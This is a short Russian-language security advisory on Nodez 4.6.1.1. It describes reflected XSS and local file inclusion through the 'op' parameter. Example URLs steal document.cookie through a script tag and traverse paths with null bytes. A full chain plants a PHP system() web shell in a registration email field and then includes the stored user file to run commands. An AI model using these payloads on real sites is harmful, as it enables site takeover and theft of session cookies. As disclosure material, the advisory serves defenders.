Программа: Nodez 4.6.1.1, возможно более ранние версии.
Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.
Пример:
http://localhost/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more
2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "op". Удаленный пользователь может подключить и выполнить произвольные
локальные файлы на системе. Дальнейшая эксплуатация уязвимости возможна путем
записи PHP код в файл "list.gtdat", который хранит данные о зарегистрированных
пользователях.
Пример:
http://localhost/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir
Пример:
register an account :
username:hamid
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) :
<?system ($_GET['cmd']);?>
and then use local file inclusion :
http://localhost/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir